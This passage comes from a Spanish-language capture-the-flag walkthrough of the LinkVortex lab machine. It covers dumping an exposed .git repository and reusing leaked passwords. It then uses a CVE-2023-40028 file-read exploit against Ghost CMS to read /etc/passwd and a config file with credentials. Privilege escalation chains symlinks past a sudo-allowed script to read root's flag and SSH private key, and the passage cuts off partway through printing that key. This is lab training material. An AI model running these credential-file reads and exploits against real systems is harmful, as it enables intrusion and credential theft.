</pre></table></code></div></div><p>Obtenemos un directorio <code class="language-plaintext highlighter-rouge">/.git</code>, así que procedí a extraer todos los objetos con GitHack:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>python GitHack.py http://dev.linkvortex.htb/.git
<span class="o">[</span>+] Download and parse index file ...
<span class="o">[</span>+] .editorconfig
<span class="o">[</span>+] .gitattributes
<span class="o">[</span>+] .github/AUTO_ASSIGN
<span class="o">[</span>+] .github/CONTRIBUTING.md
<span class="o">[</span>+] .github/FUNDING.yml
<span class="o">[</span>+] .github/ISSUE_TEMPLATE/bug-report.yml
<span class="o">[</span>+] .github/ISSUE_TEMPLATE/config.yml
<span class="o">[</span>+] .github/PULL_REQUEST_TEMPLATE.md
<span class="o">[</span>+] .github/SUPPORT.md
<span class="o">[</span>+] .github/actions/restore-cache/action.yml
<span class="o">[</span>+] .github/codecov.yml
<span class="o">[</span>+] .github/hooks/pre-commit
<span class="o">[</span>+] .github/scripts/dev.js
<span class="o">[</span>+] .github/workflows/auto-assign.yml
<span class="o">[</span>+] .github/workflows/browser-tests.yml
<span class="o">[</span>+] .github/workflows/ci.yml
<span class="o">[</span>+] .github/workflows/create-release-branch.yml
<span class="o">[</span>+] .github/workflows/custom-build.yml
<span class="o">[</span>+] .github/workflows/i18n.yml
<span class="o">[</span>+] .github/workflows/label-actions.yml
<span class="o">[</span>+] .github/workflows/migration-review.yml
<span class="o">[</span>+] .github/workflows/stale.yml
<span class="o">[</span>+] .gitignore
<span class="o">[</span>+] .gitmodules
<span class="o">[</span>+] .vscode/launch.json
<span class="o">[</span>+] .vscode/settings.json
<span class="o">[</span>+] Dockerfile.ghost
<span class="o">[</span>+] LICENSE
<span class="o">[</span>+] PRIVACY.md
<span class="o">[</span>+] README.md
<span class="o">[</span>+] SECURITY.md
<span class="o">[</span>+] apps/admin-x-settings/.eslintrc.cjs
<span class="o">[</span>+] apps/admin-x-settings/.storybook/main.tsx
<span class="o">[</span>+] apps/admin-x-settings/.storybook/preview.tsx
<span class="o">[</span>+] apps/admin-x-settings/.yarnrc
<span class="o">[</span>+] apps/admin-x-settings/README.md
<span class="o">[</span>+] apps/admin-x-settings/index.html
<span class="o">[</span>+] apps/admin-x-settings/package.json
<span class="o">[</span>+] apps/admin-x-settings/playwright.config.ts
<span class="o">[</span>+] apps/admin-x-settings/postcss.config.cjs
<span class="o">[</span>+] apps/admin-x-settings/public/vite.svg
<span class="o">[</span>+] apps/admin-x-settings/src/App.tsx
<span class="o">[</span>+] apps/admin-x-settings/src/admin-x-ds/Boilerplate.stories.tsx
<span class="o">[</span>+] apps/admin-x-settings/src/admin-x-ds/Boilerplate.tsx
<span class="o">[</span>+] apps/admin-x-settings/src/admin-x-ds/assets/fonts/Inter.ttf
...
</pre></table></code></div></div><p>Una vez extraido los objetos, he usado <code class="language-plaintext highlighter-rouge">grep</code> para buscar recursivamente la palabra “pass” entre todos los archivos obtenidos, logrando identificar contraseñas de prueba.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>rabb1t@hold:tools/dev.linkvortex.htb/ghost<span class="nv">$ </span><span class="nb">grep</span> <span class="nt">-r</span> <span class="s1">'pass'</span> <span class="nb">.</span> 2&gt;/dev/null
./core/test/regression/api/admin/authentication.test.js:            const password <span class="o">=</span> <span class="s1">'OctopiFociPilfer45'</span><span class="p">;</span>
./core/test/regression/api/admin/authentication.test.js:                        password,
./core/test/regression/api/admin/authentication.test.js:            await agent.loginAs<span class="o">(</span>email, password<span class="o">)</span><span class="p">;</span>
./core/test/regression/api/admin/authentication.test.js:                        password: <span class="s1">'thisissupersafe'</span>,
./core/test/regression/api/admin/authentication.test.js:                        password: <span class="s1">'thisissupersafe'</span>,
./core/test/regression/api/admin/authentication.test.js:            const password <span class="o">=</span> <span class="s1">'thisissupersafe'</span><span class="p">;</span>
./core/test/regression/api/admin/authentication.test.js:                        password,
./core/test/regression/api/admin/authentication.test.js:            await cleanAgent.loginAs<span class="o">(</span>email, password<span class="o">)</span><span class="p">;</span>
./core/test/regression/api/admin/authentication.test.js:                        password: <span class="s1">'lel123456'</span>,
./core/test/regression/api/admin/authentication.test.js:                        password: <span class="s1">'12345678910'</span>,
./core/test/regression/api/admin/authentication.test.js:                        password: <span class="s1">'12345678910'</span>,
./core/test/regression/api/admin/authentication.test.js:        it<span class="o">(</span><span class="s1">'reset password'</span>, async <span class="k">function</span> <span class="o">()</span> <span class="o">{</span>
</pre></table></code></div></div><p>En el sitio principal “http://linkvortex.htb” habían publicaciones de un usuario con nombre de usuario “admin”, así que probé las contraseñas en el login del CMS de Ghost para ese usuario y logré iniciar sesión con las siguientes credenciales:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>admin@linkvortex.htb:OctopiFociPilfer45
</pre></table></code></div></div><p><img data-src="/assets/favicon/2025-04-12/linkvortex3.png" alt="Web linkvortex" data-proofer-ignore></p><h2 id="explotando-la-vulnerabilidad-lfi-en-el-ghost"><span class="mr-2">Explotando la vulnerabilidad LFI en el Ghost</span><a href="#explotando-la-vulnerabilidad-lfi-en-el-ghost" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Ahora que tenemos credenciales, podemos recordar que en la enumeración identificamos una versión vulnerable del CMS Ghost a un Arbitrary File Read, así que usamos el exploit para enumerar recursos internos de la máquina. En este cso lo usamos para leer el contenido del archivo <code class="language-plaintext highlighter-rouge">/etc/passwd</code>.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>./exploit2.sh <span class="nt">-u</span> admin@linkvortex.htb <span class="nt">-p</span> OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file&gt; /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
</pre></table></code></div></div><p>Intenté leer el contenido del archivo <code class="language-plaintext highlighter-rouge">/home/node/.ssh/id_rsa</code> pero no obtuve nada (parece ser un contenedor).</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>file&gt; /home/node/.ssh/id_rsa
&lt;<span class="o">!</span>DOCTYPE html&gt;
&lt;html <span class="nv">lang</span><span class="o">=</span><span class="s2">"en"</span><span class="o">&gt;</span>
&lt;<span class="nb">head</span><span class="o">&gt;</span>
&lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">&gt;</span>
&lt;title&gt;Error&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;pre&gt;Not Found&lt;/pre&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre></table></code></div></div><p>En este punto recordé que habúa un archivo identificado en los objetos <code class="language-plaintext highlighter-rouge">/.git</code>, así que procedí a leerlo:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre><td class="rouge-code"><pre>file&gt; /var/lib/ghost/config.production.json
<span class="o">{</span>
  <span class="s2">"url"</span>: <span class="s2">"http://localhost:2368"</span>,
  <span class="s2">"server"</span>: <span class="o">{</span>
    <span class="s2">"port"</span>: 2368,
    <span class="s2">"host"</span>: <span class="s2">"::"</span>
  <span class="o">}</span>,
  <span class="s2">"mail"</span>: <span class="o">{</span>
    <span class="s2">"transport"</span>: <span class="s2">"Direct"</span>
  <span class="o">}</span>,
  <span class="s2">"logging"</span>: <span class="o">{</span>
    <span class="s2">"transports"</span>: <span class="o">[</span><span class="s2">"stdout"</span><span class="o">]</span>
  <span class="o">}</span>,
  <span class="s2">"process"</span>: <span class="s2">"systemd"</span>,
  <span class="s2">"paths"</span>: <span class="o">{</span>
    <span class="s2">"contentPath"</span>: <span class="s2">"/var/lib/ghost/content"</span>
  <span class="o">}</span>,
  <span class="s2">"spam"</span>: <span class="o">{</span>
    <span class="s2">"user_login"</span>: <span class="o">{</span>
        <span class="s2">"minWait"</span>: 1,
        <span class="s2">"maxWait"</span>: 604800000,
        <span class="s2">"freeRetries"</span>: 5000
    <span class="o">}</span>
  <span class="o">}</span>,
  <span class="s2">"mail"</span>: <span class="o">{</span>
     <span class="s2">"transport"</span>: <span class="s2">"SMTP"</span>,
     <span class="s2">"options"</span>: <span class="o">{</span>
      <span class="s2">"service"</span>: <span class="s2">"Google"</span>,
      <span class="s2">"host"</span>: <span class="s2">"linkvortex.htb"</span>,
      <span class="s2">"port"</span>: 587,
      <span class="s2">"auth"</span>: <span class="o">{</span>
        <span class="s2">"user"</span>: <span class="s2">"bob@linkvortex.htb"</span>,
        <span class="s2">"pass"</span>: <span class="s2">"fibber-talented-worth"</span>
        <span class="o">}</span>
      <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>
file&gt;
</pre></table></code></div></div><p>Podemos observar que existe un usuario llamado “bob” con una contraseña. Probé a utilizar la contraseña del usuario bob través de SSH y funcionó.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>ssh bob@10.10.11.47
The authenticity of host <span class="s1">'10.10.11.47 (10.10.11.47)'</span> can<span class="s1">'t be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>10.10.11.47<span class="s1">' (ED25519) to the list of known hosts.
bob@10.10.11.47'</span>s password: 
Welcome to Ubuntu 22.04.5 LTS <span class="o">(</span>GNU/Linux 6.5.0-27-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that <span class="nb">users </span><span class="k">do </span>not log into.

To restore this content, you can run the <span class="s1">'unminimize'</span> command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Apr  6 04:10:21 2025 from 10.10.14.79
bob@linkvortex:~<span class="err">$</span>
</pre></table></code></div></div><h2 id="escalando-privilegios"><span class="mr-2">Escalando privilegios</span><a href="#escalando-privilegios" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Una vez dentro de la máquina he procedido a revisar los permisos en sudoers. Podemos identificar que tenemos permisos para ejecutar <code class="language-plaintext highlighter-rouge">/opt/ghost/clean_symlink.sh</code> sobre cualquier imagen con extensión <code class="language-plaintext highlighter-rouge">png</code>. Además, existe la posibilidad de cambiar el valor de la variable de entorno <code class="language-plaintext highlighter-rouge">CHECK_CONTENT</code>.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>bob@linkvortex:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>bob on linkvortex:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty, env_keep+<span class="o">=</span>CHECK_CONTENT

User bob may run the following commands on linkvortex:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh <span class="k">*</span>.png
</pre></table></code></div></div><h3 id="analizando-código"><span class="mr-2">Analizando Código</span><a href="#analizando-código" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>He procedido a revisar el archivo sobre el cual tenemos permisos de ejecución como usuario root.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre><td class="rouge-code"><pre>bob@linkvortex:~<span class="nv">$ </span><span class="nb">cat</span> /opt/ghost/clean_symlink.sh
<span class="c">#!/bin/bash</span>

<span class="nv">QUAR_DIR</span><span class="o">=</span><span class="s2">"/var/quarantined"</span>

<span class="k">if</span> <span class="o">[</span> <span class="nt">-z</span> <span class="nv">$CHECK_CONTENT</span> <span class="o">]</span><span class="p">;</span><span class="k">then
  </span><span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">false
</span><span class="k">fi

</span><span class="nv">LINK</span><span class="o">=</span><span class="nv">$1</span>

<span class="k">if</span> <span class="o">!</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$LINK</span><span class="s2">"</span> <span class="o">=</span>~ <span class="se">\.</span>png<span class="nv">$ </span><span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
  /usr/bin/echo <span class="s2">"! First argument must be a png file !"</span>
  <span class="nb">exit </span>2
<span class="k">fi

if</span> /usr/bin/sudo /usr/bin/test <span class="nt">-L</span> <span class="nv">$LINK</span><span class="p">;</span><span class="k">then
  </span><span class="nv">LINK_NAME</span><span class="o">=</span><span class="si">$(</span>/usr/bin/basename <span class="nv">$LINK</span><span class="si">)</span>
  <span class="nv">LINK_TARGET</span><span class="o">=</span><span class="si">$(</span>/usr/bin/readlink <span class="nv">$LINK</span><span class="si">)</span>
  <span class="k">if</span> /usr/bin/echo <span class="s2">"</span><span class="nv">$LINK_TARGET</span><span class="s2">"</span> | /usr/bin/grep <span class="nt">-Eq</span> <span class="s1">'(etc|root)'</span><span class="p">;</span><span class="k">then</span>
    /usr/bin/echo <span class="s2">"! Trying to read critical files, removing link [ </span><span class="nv">$LINK</span><span class="s2"> ] !"</span>
    /usr/bin/unlink <span class="nv">$LINK</span>
  <span class="k">else</span>
    /usr/bin/echo <span class="s2">"Link found [ </span><span class="nv">$LINK</span><span class="s2"> ] , moving it to quarantine"</span>
    /usr/bin/mv <span class="nv">$LINK</span> <span class="nv">$QUAR_DIR</span>/
    <span class="k">if</span> <span class="nv">$CHECK_CONTENT</span><span class="p">;</span><span class="k">then</span>
      /usr/bin/echo <span class="s2">"Content:"</span>
      /usr/bin/cat <span class="nv">$QUAR_DIR</span>/<span class="nv">$LINK_NAME</span> 2&gt;/dev/null
    <span class="k">fi
  fi
fi</span>
</pre></table></code></div></div><p>He procedido a explicar el código en el siguiente bloque.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
</pre><td class="rouge-code"><pre><span class="c">#!/bin/bash</span>

<span class="c"># Directorio donde se moverán los enlaces simbólicos sospechosos</span>
<span class="nv">QUAR_DIR</span><span class="o">=</span><span class="s2">"/var/quarantined"</span>

<span class="c"># Si la variable de entorno CHECK_CONTENT no está definida, se establece en false</span>
<span class="k">if</span> <span class="o">[</span> <span class="nt">-z</span> <span class="nv">$CHECK_CONTENT</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
  </span><span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">false
</span><span class="k">fi</span>

<span class="c"># archivo .png</span>
<span class="nv">LINK</span><span class="o">=</span><span class="nv">$1</span>

<span class="c"># Verifica que el argumento termine en .png</span>
<span class="k">if</span> <span class="o">!</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$LINK</span><span class="s2">"</span> <span class="o">=</span>~ <span class="se">\.</span>png<span class="nv">$ </span><span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
  /usr/bin/echo <span class="s2">"! First argument must be a png file !"</span>
  <span class="nb">exit </span>2
<span class="k">fi</span>

<span class="c"># Verifica si el archivo es un enlace simbólico</span>
<span class="k">if</span> /usr/bin/sudo /usr/bin/test <span class="nt">-L</span> <span class="nv">$LINK</span><span class="p">;</span> <span class="k">then</span>
  <span class="c"># Obtiene el nombre base del enlace (sin ruta)</span>
  <span class="nv">LINK_NAME</span><span class="o">=</span><span class="si">$(</span>/usr/bin/basename <span class="nv">$LINK</span><span class="si">)</span>
  
  <span class="c"># Obtiene el destino al que apunta el enlace</span>
  <span class="nv">LINK_TARGET</span><span class="o">=</span><span class="si">$(</span>/usr/bin/readlink <span class="nv">$LINK</span><span class="si">)</span>

  <span class="c"># Si el enlace apunta a una ruta que contiene "etc" o "root", se considera crítico</span>
  <span class="k">if</span> /usr/bin/echo <span class="s2">"</span><span class="nv">$LINK_TARGET</span><span class="s2">"</span> | /usr/bin/grep <span class="nt">-Eq</span> <span class="s1">'(etc|root)'</span><span class="p">;</span> <span class="k">then</span>
    <span class="c"># Se elimina el enlace simbólico por seguridad</span>
    /usr/bin/echo <span class="s2">"! Trying to read critical files, removing link [ </span><span class="nv">$LINK</span><span class="s2"> ] !"</span>
    /usr/bin/unlink <span class="nv">$LINK</span>
  <span class="k">else</span>
    <span class="c"># Si no es crítico, se mueve a la carpeta de cuarentena</span>
    /usr/bin/echo <span class="s2">"Link found [ </span><span class="nv">$LINK</span><span class="s2"> ] , moving it to quarantine"</span>
    /usr/bin/mv <span class="nv">$LINK</span> <span class="nv">$QUAR_DIR</span>/
    <span class="k">if</span> <span class="nv">$CHECK_CONTENT</span><span class="p">;</span> <span class="k">then</span>
      <span class="c"># Si CHECK_CONTENT es true, se muestra el contenido del archivo apuntado (si existe)</span>
      /usr/bin/echo <span class="s2">"Content:"</span>
      /usr/bin/cat <span class="nv">$QUAR_DIR</span>/<span class="nv">$LINK_NAME</span> 2&gt;/dev/null
    <span class="k">fi
  fi
fi</span>
</pre></table></code></div></div><p>Evidenciando la falla, he procedido a concatenar dos enlaces simbólicos con el fin de eludir la detección de <code class="language-plaintext highlighter-rouge">(etc|root)</code> y posteriormente realizo la ejecución del script.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>bob@linkvortex:~<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-s</span> /root/root.txt test.txt
bob@linkvortex:~<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-s</span> /home/bob/test.txt test.png
bob@linkvortex:~<span class="nv">$ </span><span class="nb">sudo </span><span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">true</span> /usr/bin/bash /opt/ghost/clean_symlink.sh <span class="k">*</span>.png
Link found <span class="o">[</span> test.png <span class="o">]</span> , moving it to quarantine
Content:
bdbb0<span class="k">***********</span>fe7c2c
</pre></table></code></div></div><p>Podemos desglosarlo un poco más y con la intención de leer el archivo “root.txt” del usurio root.</p><p>Creo un enlace simbólico llamado <code class="language-plaintext highlighter-rouge">test.txt</code> que apunta a <code class="language-plaintext highlighter-rouge">/root/root.txt</code>.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">ln</span> <span class="nt">-s</span> /root/root.txt test.txt
</pre></table></code></div></div><p>También creo otro enlace simbólico llamado <code class="language-plaintext highlighter-rouge">test.png</code> que apunta a <code class="language-plaintext highlighter-rouge">/home/bob/test.txt</code>, formando una cadena de enlaces: test.png –&gt; test.txt –&gt; /root/root.txt</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">ln</span> <span class="nt">-s</span> /home/bob/test.txt test.png
</pre></table></code></div></div><p>Ejecuto el script, pasando <code class="language-plaintext highlighter-rouge">*.png</code> como argumento y asignando <code class="language-plaintext highlighter-rouge">CHECK_CONTENT=true</code>.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">sudo </span><span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">true</span> /usr/bin/bash /opt/ghost/clean_symlink.sh <span class="k">*</span>.png
</pre></table></code></div></div><p>El script recibe <code class="language-plaintext highlighter-rouge">test.png</code> como argumento y como termina en <code class="language-plaintext highlighter-rouge">.png</code>, se sigue ejecutando.</p><p>Verifica si <code class="language-plaintext highlighter-rouge">test.png</code> es un enlace simbólico, y lo es, así que continúa.</p><p>Obtenemos:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">LINK_NAME</span><span class="o">=</span>test.png
<span class="nv">LINK_TARGET</span><span class="o">=</span>/home/bob/test.txt <span class="o">(</span>usando <span class="nb">readlink</span><span class="o">)</span>
</pre></table></code></div></div><p>Chequea si el LINK_TARGET contiene las palabras “etc” o “root”:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$LINK_TARGET</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="nt">-Eq</span> <span class="s1">'(etc|root)'</span>
</pre></table></code></div></div><p>El valor es <code class="language-plaintext highlighter-rouge">/home/bob/test.txt</code> y mueve el enlace <code class="language-plaintext highlighter-rouge">test.png</code> a la carpeta <code class="language-plaintext highlighter-rouge">/var/quarantined</code>.</p><p>Como asigno <code class="language-plaintext highlighter-rouge">CHECK_CONTENT=true</code>, se intenta mostrar el contenido:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">cat</span> /var/quarantined/test.png
</pre></table></code></div></div><p>El script no está bien codificado para sanitizar los enlaces simbólicos, porque el destino directo del symlink (<code class="language-plaintext highlighter-rouge">/home/bob/test.txt</code>) no contiene “root” o “etc” en su ruta pero como <code class="language-plaintext highlighter-rouge">test.png</code> apunta en cadena hasta <code class="language-plaintext highlighter-rouge">/root/root.txt</code> y hemos asginado <code class="language-plaintext highlighter-rouge">CHECK_CONTENT=true</code>, se termina imprimiendo el contenido del archivo en <code class="language-plaintext highlighter-rouge">/root</code>.</p><p>Teniendo en cuenta lo anterior, procedí a obtener la información del archivo <code class="language-plaintext highlighter-rouge">id_rsa</code> del directorio <code class="language-plaintext highlighter-rouge">/root/.ssh/id_rsa</code> con el fin de posteriormente conectarnos a través de SSH.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre><td class="rouge-code"><pre>bob@linkvortex:~<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-s</span> /root/.ssh/id_rsa test.testing
bob@linkvortex:~<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-s</span> /home/bob/test.testing test.png
bob@linkvortex:~<span class="nv">$ </span><span class="nb">sudo </span><span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">true</span> /usr/bin/bash /opt/ghost/clean_symlink.sh <span class="k">*</span>.png
Link found <span class="o">[</span> test.png <span class="o">]</span> , moving it to quarantine
Content:
<span class="nt">-----BEGIN</span> OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAmpHVhV11MW7eGt9WeJ23rVuqlWnMpF+FclWYwp4SACcAilZdOF8T
q2egYfeMmgI9IoM0DdyDKS4vG+lIoWoJEfZf+cVwaZIzTZwKm7ECbF2Oy+u2SD+X7lG9A6
V1xkmWhQWEvCiI22UjIoFkI0oOfDrm6ZQTyZF99AqBVcwGCjEA67eEKt/5oejN5YgL7Ipu
6sKpMThUctYpWnzAc4yBN/mavhY7v5+TEV0FzPYZJ2spoeB3OGBcVNzSL41ctOiqGVZ7yX
